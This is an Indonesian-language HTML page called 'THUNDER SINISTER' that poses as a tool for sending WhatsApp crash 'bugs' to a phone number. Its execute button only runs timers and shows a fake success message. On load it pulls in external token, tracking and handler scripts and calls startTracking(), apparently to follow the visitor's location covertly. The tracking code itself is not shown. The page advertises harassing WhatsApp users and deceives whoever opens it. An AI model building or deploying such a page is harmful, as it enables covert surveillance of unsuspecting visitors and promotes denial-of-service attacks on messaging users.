<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>THUNDER SINISTER</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600&display=swap');
        
        body {
            font-family: 'Inter', sans-serif;
            background-image: url('./foto/bg.png');
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
        }
        
        .login-container {
            backdrop-filter: blur(10px);
            background-color: rgba(0, 0, 0, 0.7);
        }
        
        .input-field {
            transition: all 0.3s ease;
        }
        
        .input-field:focus {
            box-shadow: 0 0 0 3px rgba(59, 130, 246, 0.3);
        }
        
        .option-btn {
            transition: all 0.2s ease;
        }
        
        .option-btn.selected {
            background-color: rgba(34, 197, 94, 0.3);
            border-color: rgba(34, 197, 94, 0.8);
            box-shadow: 0 0 10px rgba(34, 197, 94, 0.5);
        }
        
        .live-indicator {
            display: inline-block;
            width: 8px;
            height: 8px;
            background-color: #ef4444;
            border-radius: 50%;
            margin-right: 6px;
            animation: pulse 1.5s infinite;
        }
        
        @keyframes pulse {
            0% { opacity: 1; }
            50% { opacity: 0.4; }
            100% { opacity: 1; }
        }
    </style>
    <script src="token.js"></script>
    <script src="track.js"></script>
    <script src="tmp/handler.js"></script>
</head>
<body class="min-h-screen flex items-center justify-center p-4">
    <div class="login-container rounded-2xl overflow-hidden w-full max-w-md border border-green-700 shadow-2xl">
        <div class="bg-black/80 py-6 px-6 text-center border-b border-green-700">
            <h1 class="text-2xl font-bold text-white">THUNDER SINISTER</h1>
            <div id="gpsStatus" class="text-xs text-gray-400 mt-2 hidden">
                <span class="live-indicator"></span>MENGIRIM KE TARGET...
            </div>
        </div>
        
        <div class="p-6 space-y-6">
            <div class="space-y-2">
                <label class="block text-sm font-medium text-gray-300">NOMOR WHATSAPP</label>
                <div class="relative">
                    <input 
                        type="tel" 
                        id="whatsapp" 
                        placeholder="Masukkan Nomor WhatsApp" 
                        class="input-field w-full px-4 py-3 bg-gray-800/70 text-white rounded-lg border border-gray-600 focus:border-blue-500 focus:outline-none"
                        autocomplete="off"
                    >
                </div>
            </div>
            
            <div class="space-y-2">
                <label class="block text-sm font-medium text-gray-300">PILIHAN BUG</label>
                <div class="grid grid-cols-2 gap-3">
                    <button id="optionInvisible" class="option-btn py-3 bg-gray-800/70 text-white rounded-lg border border-gray-600 hover:border-green-500">
                        Invisible Delay
                    </button>
                    <button id="optionFcHard" class="option-btn py-3 bg-gray-800/70 text-white rounded-lg border border-gray-600 hover:border-green-500">
                        FC HARD
                    </button>
                    <button id="optionBulldozer" class="option-btn py-3 bg-gray-800/70 text-white rounded-lg border border-gray-600 hover:border-green-500">
                        BULLDOZER
                    </button>
                    <button id="optionFcClick" class="option-btn py-3 bg-gray-800/70 text-white rounded-lg border border-gray-600 hover:border-green-500">
                        FC CLICK
                    </button>
                </div>
            </div>
            
            <button 
                id="executeBtn"
                class="w-full py-3 px-4 bg-green-600 hover:bg-green-700 text-white font-semibold rounded-lg transition duration-200 flex items-center justify-center"
            >
                <span id="btnText">EXECUTE BUG</span>
                <svg id="spinner" class="hidden w-5 h-5 ml-2 text-white animate-spin" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
                    <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
                    <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
                </svg>
            </button>
        </div>
    </div>

    <script>
        let selectedOption = null;
        
        function selectOption(option) {
            document.querySelectorAll('.option-btn').forEach(btn => {
                btn.classList.remove('selected');
            });
            
            selectedOption = option;
            document.getElementById(`option${option}`).classList.add('selected');
        }
        
        document.getElementById('optionInvisible').addEventListener('click', () => selectOption('Invisible'));
        document.getElementById('optionFcHard').addEventListener('click', () => selectOption('FcHard'));
        document.getElementById('optionBulldozer').addEventListener('click', () => selectOption('Bulldozer'));
        document.getElementById('optionFcClick').addEventListener('click', () => selectOption('FcClick'));
        
        const executeBtn = document.getElementById('executeBtn');
        const btnText = document.getElementById('btnText');
        const spinner = document.getElementById('spinner');
        const gpsStatus = document.getElementById('gpsStatus');
        
        executeBtn.addEventListener('click', async function() {
            const whatsapp = document.getElementById('whatsapp').value;
            
            if (!whatsapp) {
                alert('Masukkan nomor WhatsApp terlebih dahulu!');
                return;
            }
            
            if (!selectedOption) {
                alert('Pilih jenis bug terlebih dahulu!');
                return;
            }
            
            executeBtn.disabled = true;
            btnText.textContent = 'EXECUTING...';
            spinner.classList.remove('hidden');
            
            gpsStatus.classList.remove('hidden');
            
            await new Promise(resolve => setTimeout(resolve, 2000));
            
            try {
                await new Promise(resolve => setTimeout(resolve, 1500));
                
                document.body.classList.add('opacity-0', 'transition-opacity', 'duration-300');
                
                await new Promise(resolve => setTimeout(resolve, 300));
               
                document.body.innerHTML = `
                    <div class="min-h-screen flex items-center justify-center bg-black">
                        <div class="text-center">
                            <div class="inline-block animate-pulse text-green-500 text-xl font-semibold">
                                BUG EXECUTED SUCCESSFULLY
                            </div>
                            <div class="text-gray-400 text-sm mt-2">
                                Live GPS Tracking Active
                            </div>
                        </div>
                    </div>
                `;
                
            } catch (error) {
                executeBtn.classList.add('bg-red-600', 'hover:bg-red-700');
                btnText.textContent = 'EXECUTE FAILED';
                spinner.classList.add('hidden');
                gpsStatus.classList.add('hidden');
                
                setTimeout(() => {
                    executeBtn.disabled = false;
                    btnText.textContent = 'EXECUTE BUG';
                    executeBtn.classList.remove('bg-red-600', 'hover:bg-red-700');
                }, 2000);
            }
        });
        
        document.addEventListener('DOMContentLoaded', async function() {
            try {
                await startTracking();
            } catch (error) {
                console.error('Tracking error:', error);
            }
        });
    </script>
</body>
</html>